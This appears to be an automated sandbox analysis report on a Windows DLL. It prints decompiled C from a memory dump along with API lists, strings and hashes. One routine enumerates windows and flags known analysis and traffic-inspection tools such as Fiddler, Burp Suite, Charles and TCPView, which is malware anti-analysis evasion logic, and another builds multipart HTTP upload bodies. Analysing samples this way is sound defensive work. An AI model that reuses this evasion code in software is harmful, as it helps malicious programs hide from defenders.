                                                                                                                                                                  				char _v15703;
                                                                                                                                                                  				char _v15704;
                                                                                                                                                                  				char* _v15708;
                                                                                                                                                                  				char _v29807;
                                                                                                                                                                  				char _v29808;
                                                                                                                                                                  				char* _v29812;
                                                                                                                                                                  				char _v43911;
                                                                                                                                                                  				char _v43912;
                                                                                                                                                                  				char _v58007;
                                                                                                                                                                  				char _v58008;
                                                                                                                                                                  				char _v58024;
                                                                                                                                                                  				char _v58052;
                                                                                                                                                                  				char _v58080;
                                                                                                                                                                  				char _v58084;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t172;
                                                                                                                                                                  				intOrPtr _t179;
                                                                                                                                                                  				void* _t186;
                                                                                                                                                                  				void* _t195;
                                                                                                                                                                  				void* _t216;
                                                                                                                                                                  				void* _t218;
                                                                                                                                                                  				void* _t237;
                                                                                                                                                                  				void* _t254;
                                                                                                                                                                  				intOrPtr _t297;
                                                                                                                                                                  				intOrPtr _t357;
                                                                                                                                                                  				void* _t359;
                                                                                                                                                                  				void* _t366;
                                                                                                                                                                  				void* _t376;
                                                                                                                                                                  				void* _t385;
                                                                                                                                                                  				void* _t392;
                                                                                                                                                                  
                                                                                                                                                                  				_t353 = __edi;
                                                                                                                                                                  				_t265 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100231DA);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t357;
                                                                                                                                                                  				E10018B00(0xe2d4);
                                                                                                                                                                  				_push(_t354);
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v28 = "--";
                                                                                                                                                                  				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
                                                                                                                                                                  					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
                                                                                                                                                                  					_v1084 = "Content-Type: %s";
                                                                                                                                                                  					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
                                                                                                                                                                  					_v808 = 0;
                                                                                                                                                                  					E1000CF80(__edi,  &_v807, 0, 0x103);
                                                                                                                                                                  					_v1080 = 0;
                                                                                                                                                                  					E1000CF80(_t353,  &_v1079, 0, 0x103);
                                                                                                                                                                  					_v1600 = 0;
                                                                                                                                                                  					E1000CF80(_t353,  &_v1599, 0, 0x1ff);
                                                                                                                                                                  					_push(_a20);
                                                                                                                                                                  					_push(_a16);
                                                                                                                                                                  					E1000CCA3(_t353,  &_v808, _v812, _a16);
                                                                                                                                                                  					E1000CCA3(_t353,  &_v1080, _v1084, _a24);
                                                                                                                                                                  					_push( &_v1080);
                                                                                                                                                                  					_push( &_v808);
                                                                                                                                                                  					_push(_a4);
                                                                                                                                                                  					E1000CCA3(_t353,  &_v1600, _v1088, _v28);
                                                                                                                                                                  					_t392 = _t357 + 0x5c;
                                                                                                                                                                  					if( *_a36 != 0) {
                                                                                                                                                                  						E1000D1F0(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAD0( &_v1600));
                                                                                                                                                                  						_t392 = _t392 + 0x10;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t254 = E1000CAD0( &_v1600);
                                                                                                                                                                  					_t357 = _t392 + 4;
                                                                                                                                                                  					_v24 = _t254 + _v24;
                                                                                                                                                                  					if( *_a36 != 0) {
                                                                                                                                                                  						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
                                                                                                                                                                  						_t357 = _t357 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v24 = _v24 + _a32;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_a8 != 0 && _a12 > 0) {
                                                                                                                                                                  					_t172 = E10001A50(_a8, "=");
                                                                                                                                                                  					_t357 = _t357 + 8;
                                                                                                                                                                  					if(_t172 != 0) {
                                                                                                                                                                  						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
                                                                                                                                                                  						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
                                                                                                                                                                  						_v58008 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v58007, 0, 0x370f);
                                                                                                                                                                  						_v29808 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v29807, 0, 0x370f);
                                                                                                                                                                  						_v43912 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v43911, 0, 0x370f);
                                                                                                                                                                  						_v15704 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v15703, 0, 0x370f);
                                                                                                                                                                  						_t179 = E10001A50(_a8, "&");
                                                                                                                                                                  						_t366 = _t357 + 0x38;
                                                                                                                                                                  						_v1604 = _t179;
                                                                                                                                                                  						if(_v1604 != 0) {
                                                                                                                                                                  							E10001160( &_v58052, __eflags, _a8);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							E10003060( &_v58024, __eflags);
                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                  							E10001160( &_v58080, __eflags, "&");
                                                                                                                                                                  							_v8 = 2;
                                                                                                                                                                  							E1001A8B0(__eflags,  &_v58052,  &_v58024,  &_v58080);
                                                                                                                                                                  							_t357 = _t366 + 0xc;
                                                                                                                                                                  							_v58084 = 0;
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t186 = E10002270( &_v58024);
                                                                                                                                                                  								__eflags = _v58084 - _t186;
                                                                                                                                                                  								if(_v58084 >= _t186) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								E1000CF80(_t353,  &_v43912, 0, 0x3710);
                                                                                                                                                                  								E1000CF80(_t353,  &_v15704, 0, 0x3710);
                                                                                                                                                                  								_t195 = E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=");
                                                                                                                                                                  								_t354 = _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084));
                                                                                                                                                                  								E1000D1F0(_t265, _t353, _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E100030B0( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)));
                                                                                                                                                                  								E1000D903(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=") + 1);
                                                                                                                                                                  								E1000CF80(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                                  								E1000CF80(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                                  								E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                                  								_push( &_v15704);
                                                                                                                                                                  								_push( &_v58008);
                                                                                                                                                                  								_push(_a4);
                                                                                                                                                                  								E1000CCA3(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                                  								_t376 = _t357 + 0x7c;
                                                                                                                                                                  								__eflags =  *_a36;
                                                                                                                                                                  								if( *_a36 != 0) {
                                                                                                                                                                  									_t218 = E1000CAD0( &_v29808);
                                                                                                                                                                  									__eflags =  *_a36 + _v24;
                                                                                                                                                                  									E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
                                                                                                                                                                  									_t376 = _t376 + 0x10;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t216 = E1000CAD0( &_v29808);
                                                                                                                                                                  								_t357 = _t376 + 4;
                                                                                                                                                                  								_v24 = _t216 + _v24;
                                                                                                                                                                  								_t297 = _v58084 + 1;
                                                                                                                                                                  								__eflags = _t297;
                                                                                                                                                                  								_v58084 = _t297;
                                                                                                                                                                  							}
                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                  							E100011A0( &_v58080);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							E10003090( &_v58024);
                                                                                                                                                                  							_v8 = 0xffffffff;
                                                                                                                                                                  							E100011A0( &_v58052);
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E1000D1F0(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
                                                                                                                                                                  							E1000D903(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
                                                                                                                                                                  							E1000CF80(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                                  							E1000CF80(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                                  							E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                                  							_push( &_v15704);
                                                                                                                                                                  							_push( &_v58008);
                                                                                                                                                                  							_push(_a4);
                                                                                                                                                                  							E1000CCA3(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                                  							_t385 = _t366 + 0x64;
                                                                                                                                                                  							if( *_a36 != 0) {
                                                                                                                                                                  								E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAD0( &_v29808));
                                                                                                                                                                  								_t385 = _t385 + 0x10;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t237 = E1000CAD0( &_v29808);
                                                                                                                                                                  							_t357 = _t385 + 4;
                                                                                                                                                                  							_v24 = _t237 + _v24;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_v20 = "\r\n%s%s%s\r\n";
                                                                                                                                                                  				_v544 = 0;
                                                                                                                                                                  				E1000CF80(_t353,  &_v543, 0, 0x1ff);
                                                                                                                                                                  				_push(_v28);
                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                  				E1000CCA3(_t353,  &_v544, _v20, _v28);
                                                                                                                                                                  				_t359 = _t357 + 0x20;
                                                                                                                                                                  				if( *_a36 != 0) {
                                                                                                                                                                  					E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAD0( &_v544));
                                                                                                                                                                  					_t359 = _t359 + 0x10;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v24 = E1000CAD0( &_v544) + _v24;
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _v24;
                                                                                                                                                                  			}


                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
• Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 854390245-0
                                                                                                                                                                  • Opcode ID: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction ID: cf3fdb6315e205635e4887c8713e315fd67cdd6efcc5cedbeed1e245040bfa00
                                                                                                                                                                  • Opcode Fuzzy Hash: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction Fuzzy Hash: F50292B6D00208ABDB10DB54DC82FDE777CEB58244F444598F509A7285EB75BB88CFA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E10011936(void* __ebx) {
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                                                  				long _t10;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  				int _t12;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				struct HINSTANCE__* _t37;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  
                                                                                                                                                                  				_t30 = __ebx;
                                                                                                                                                                  				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                                  				if(_t37 != 0) {
                                                                                                                                                                  					 *0x10335478 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                                  					 *0x1033547c = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                                  					 *0x10335480 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                                  					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                                  					__eflags =  *0x10335478;
                                                                                                                                                                  					_t40 = TlsSetValue;
                                                                                                                                                                  					 *0x10335484 = _t7;
                                                                                                                                                                  					if( *0x10335478 == 0) {
                                                                                                                                                                  						L6:
                                                                                                                                                                  						 *0x1033547c = TlsGetValue;
                                                                                                                                                                  						 *0x10335478 = E100115ED;
                                                                                                                                                                  						 *0x10335480 = _t40;
                                                                                                                                                                  						 *0x10335484 = TlsFree;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						__eflags =  *0x1033547c;
                                                                                                                                                                  						if( *0x1033547c == 0) {
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							__eflags =  *0x10335480;
                                                                                                                                                                  							if( *0x10335480 == 0) {
                                                                                                                                                                  								goto L6;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								__eflags = _t7;
                                                                                                                                                                  								if(_t7 == 0) {
                                                                                                                                                                  									goto L6;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t10 = TlsAlloc();
                                                                                                                                                                  					__eflags = _t10 - 0xffffffff;
                                                                                                                                                                  					 *0x10334594 = _t10;
                                                                                                                                                                  					if(_t10 == 0xffffffff) {
                                                                                                                                                                  						L15:
                                                                                                                                                                  						_t11 = 0;
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t12 = TlsSetValue(_t10,  *0x1033547c);
                                                                                                                                                                  						__eflags = _t12;
                                                                                                                                                                  						if(_t12 == 0) {
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E10011D56();
                                                                                                                                                                  							 *0x10335478 = E1001151E( *0x10335478);
                                                                                                                                                                  							 *0x1033547c = E1001151E( *0x1033547c);
                                                                                                                                                                  							 *0x10335480 = E1001151E( *0x10335480);
                                                                                                                                                                  							 *0x10335484 = E1001151E( *0x10335484);
                                                                                                                                                                  							_t18 = E1000F8ED();
                                                                                                                                                                  							__eflags = _t18;
                                                                                                                                                                  							if(_t18 == 0) {
                                                                                                                                                                  								L14:
                                                                                                                                                                  								E10011620();
                                                                                                                                                                  								goto L15;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(L100117AC);
                                                                                                                                                                  								_t21 =  *((intOrPtr*)(E1001158A( *0x10335478)))();
                                                                                                                                                                  								__eflags = _t21 - 0xffffffff;
                                                                                                                                                                  								 *0x10334590 = _t21;
                                                                                                                                                                  								if(_t21 == 0xffffffff) {
                                                                                                                                                                  									goto L14;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t42 = E10014911(1, 0x214);
                                                                                                                                                                  									__eflags = _t42;
                                                                                                                                                                  									if(_t42 == 0) {
                                                                                                                                                                  										goto L14;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push(_t42);
                                                                                                                                                                  										_push( *0x10334590);
                                                                                                                                                                  										__eflags =  *((intOrPtr*)(E1001158A( *0x10335480)))();
                                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                                  											goto L14;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push(0);
                                                                                                                                                                  											_push(_t42);
                                                                                                                                                                  											E1001165D(_t30, _t37, _t42, __eflags);
                                                                                                                                                                  											_t26 = GetCurrentThreadId();
                                                                                                                                                                  											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                                  											 *_t42 = _t26;
                                                                                                                                                                  											_t11 = 1;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t11;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E10011620();
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}
















                                                                                                                                                                  0x10011aad
                                                                                                                                                                  0x10011a93
                                                                                                                                                                  0x10011a7a
                                                                                                                                                                  0x10011a66
                                                                                                                                                                  0x10011a49
                                                                                                                                                                  0x100119f4
                                                                                                                                                                  0x10011ab9
                                                                                                                                                                  0x10011948
                                                                                                                                                                  0x10011948
                                                                                                                                                                  0x10011950
                                                                                                                                                                  0x10011950

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000EA1D), ref: 1001193C
                                                                                                                                                                  • __mtterm.LIBCMT ref: 10011948
                                                                                                                                                                    • Part of subcall function 10011620: __decode_pointer.LIBCMT ref: 10011631
                                                                                                                                                                    • Part of subcall function 10011620: TlsFree.KERNEL32(00000020,10011AB5), ref: 1001164B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001195E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001196B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10011978
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10011985
                                                                                                                                                                  • TlsAlloc.KERNEL32 ref: 100119D5
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000), ref: 100119F0
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 100119FA
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A05
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A15
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A25
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A35
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A56
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 10011A6F
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A89
                                                                                                                                                                  • __initptd.LIBCMT ref: 10011A98
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10011A9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                  • API String ID: 2657569430-3819984048
                                                                                                                                                                  • Opcode ID: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction ID: 808ad0af3f4b6be62188e372f3d3457f3cdf16e918fc8b475f3418519981f6d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction Fuzzy Hash: 16318F358042219AE709EF76ACC56893AB9EB84296F52062AF569DF1E3DF31D4C09B10
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019430(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                  				char _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				char _v531;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				void* _t43;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  				void* _t53;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				void* _t92;
                                                                                                                                                                  				void* _t93;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t98;
                                                                                                                                                                  				void* _t99;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  
                                                                                                                                                                  				_t87 = __edi;
                                                                                                                                                                  				_t70 = __ebx;
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v531, 0, 0x103);
                                                                                                                                                                  				_v268 = 0;
                                                                                                                                                                  				E1000CF80(_t87,  &_v267, 0, 0x103);
                                                                                                                                                                  				GetClassNameA(_a4,  &_v532, 0x104);
                                                                                                                                                                  				GetWindowTextA(_a4,  &_v268, 0x104);
                                                                                                                                                                  				_t35 = E1000CAD0( &_v532);
                                                                                                                                                                  				_t91 = _t88 + 0x1c;
                                                                                                                                                                  				_t108 = _t35;
                                                                                                                                                                  				if(_t35 <= 0) {
                                                                                                                                                                  					L30:
                                                                                                                                                                  					return 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t37 = E10019390(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
                                                                                                                                                                  				_t92 = _t91 + 8;
                                                                                                                                                                  				if(_t37 == 0) {
                                                                                                                                                                  					_t38 = E10019390(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
                                                                                                                                                                  					_t93 = _t92 + 8;
                                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						_t39 = E10019390(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
                                                                                                                                                                  						_t94 = _t93 + 8;
                                                                                                                                                                  						__eflags = _t39;
                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                  							_t41 = E10019390(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
                                                                                                                                                                  							_t95 = _t94 + 8;
                                                                                                                                                                  							__eflags = _t41;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								_t42 = E10019390(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
                                                                                                                                                                  								_t96 = _t95 + 8;
                                                                                                                                                                  								__eflags = _t42;
                                                                                                                                                                  								if(_t42 == 0) {
                                                                                                                                                                  									_t43 = E1000CAD0( &_v268);
                                                                                                                                                                  									_t97 = _t96 + 4;
                                                                                                                                                                  									__eflags = _t43;
                                                                                                                                                                  									if(__eflags <= 0) {
                                                                                                                                                                  										L20:
                                                                                                                                                                  										_t45 = E1000CAD0( &_v268);
                                                                                                                                                                  										_t98 = _t97 + 4;
                                                                                                                                                                  										__eflags = _t45;
                                                                                                                                                                  										if(__eflags <= 0) {
                                                                                                                                                                  											L23:
                                                                                                                                                                  											_t46 = E10019390(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
                                                                                                                                                                  											_t99 = _t98 + 8;
                                                                                                                                                                  											__eflags = _t46;
                                                                                                                                                                  											if(_t46 == 0) {
                                                                                                                                                                  												goto L30;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t48 = E1000CAD0( &_v268);
                                                                                                                                                                  											_t100 = _t99 + 4;
                                                                                                                                                                  											__eflags = _t48;
                                                                                                                                                                  											if(__eflags <= 0) {
                                                                                                                                                                  												L27:
                                                                                                                                                                  												__eflags = E1000CAD0( &_v268);
                                                                                                                                                                  												if(__eflags <= 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t51 = E10019390(_t70, _t87, __eflags,  &_v268, "Burp Suite");
                                                                                                                                                                  												__eflags = _t51;
                                                                                                                                                                  												if(_t51 == 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												 *0x10335dcc = 1;
                                                                                                                                                                  												return 0;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t53 = E10019390(_t70, _t87, __eflags,  &_v268, "Charles");
                                                                                                                                                                  											_t100 = _t100 + 8;
                                                                                                                                                                  											__eflags = _t53;
                                                                                                                                                                  											if(_t53 == 0) {
                                                                                                                                                                  												goto L27;
                                                                                                                                                                  											}
                                                                                                                                                                  											 *0x10335dcc = 1;
                                                                                                                                                                  											return 0;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t55 = E10019390(_t70, _t87, __eflags,  &_v268, "ASExplorer");
                                                                                                                                                                  										_t98 = _t98 + 8;
                                                                                                                                                                  										__eflags = _t55;
                                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                                  											goto L23;
                                                                                                                                                                  										}
                                                                                                                                                                  										 *0x10335dcc = 1;
                                                                                                                                                                  										return 0;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t57 = E10019390(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
                                                                                                                                                                  									_t97 = _t97 + 8;
                                                                                                                                                                  									__eflags = _t57;
                                                                                                                                                                  									if(_t57 == 0) {
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									}
                                                                                                                                                                  									 *0x10335dcc = 1;
                                                                                                                                                                  									return 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = E1000CAD0( &_v268);
                                                                                                                                                                  								if(__eflags <= 0) {
                                                                                                                                                                  									L16:
                                                                                                                                                                  									goto L30;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t61 = E10019390(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
                                                                                                                                                                  								__eflags = _t61;
                                                                                                                                                                  								if(_t61 == 0) {
                                                                                                                                                                  									goto L16;
                                                                                                                                                                  								}
                                                                                                                                                                  								 *0x10335dcc = 1;
                                                                                                                                                                  								return 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							 *0x10335dcc = 1;
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						 *0x10335dcc = 1;
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *0x10335dcc = 1;
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t66 = E1000CAD0( &_v268);
                                                                                                                                                                  				_t110 = _t66;
                                                                                                                                                                  				if(_t66 <= 0 || E10019390(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
                                                                                                                                                                  					goto L30;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					 *0x10335dcc = 1;
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001944E
                                                                                                                                                                  • _memset.LIBCMT ref: 1001946B
                                                                                                                                                                  • GetClassNameA.USER32(?,00000000,00000104), ref: 10019483
                                                                                                                                                                  • GetWindowTextA.USER32 ref: 10019499
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194A6
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 1001939B
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 100193A9
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194D5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                                  • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                                  • API String ID: 1565133231-1140939848
                                                                                                                                                                  • Opcode ID: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction ID: 51e88d16b42fffacdf90acd9036bc3218a7670d11f06c4b4a6332502e68566f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
